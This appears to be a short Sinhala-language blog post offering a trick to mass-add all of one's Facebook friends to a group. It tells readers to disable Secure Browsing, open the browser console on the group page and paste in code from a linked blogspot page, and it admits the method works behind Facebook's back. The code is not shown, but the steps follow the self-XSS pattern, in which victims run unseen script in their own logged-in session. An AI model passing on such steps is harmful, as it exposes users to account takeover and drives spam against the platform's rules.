ඔන්න යාළුවනේ, අද ඔයගොල්ලන්ට කියන්න යන්නෙ කොහොමද විනාඩියකට අඩු කාලයකින් අපෙ Account එකේ ඉන්න කට්ටිය අපෙ Facebook group එකට කරගන්නෙ කොහොමද කියලයි.මේක එච්චර අමාරු වඩක් නෙමෙයි.පහලින් තියෙන පියවර අනුගමනය කරමින් වැඩේ කරන්නකො.
Step 1-: මුලින්ම ඔයගේ Facebook account එකට යන්න.ඉන් පසුව ඔබ Secure browsing, Disable කළ යුතුයි.
(Privacy settings>>Security>>Disable Secure browsing)
Step 2-: දෙවනුව, ඔබගේ Facebook group එකට යන්න.
Step 3-:inspect element bar එක ගන්න.(Right click>>inspect elements)
Step 4-: දැන් ඒ bar එකේ Console කියන තැන click කරන්න.
Step 5-: දැන් ඉතින් පල්ලෙහා තියෙන එකට ගිහින් ඒකෙ තියෙන Code එක Copy කර Paste කරන්න.
http://imacroscripts4u.blogspot.com/2013/11/best-process-for-increase-our-facebook.html
ඉක්මන් වෙන්න,තව කොච්චර දවස් තියෙයිද දන්නෙ නෑ.මොකද, මේකත් Facebook එකට හොරෙන් කරන වැඩක් තමයි.ඔයගොල්ලො මේක කරල වැඩ කරන්නෙ නැත්තම් මට කියන්න.තව එකක්,මම් මේ පල්ලෙහයින් දාලා තියෙන බ්ලොගයේ ඔය වගේ ක්‍රම හුගාක් තියෙනව.
http://imacroscripts4u.blogspot.com/
එහෙනම් ඔබට සුභ දවසක්.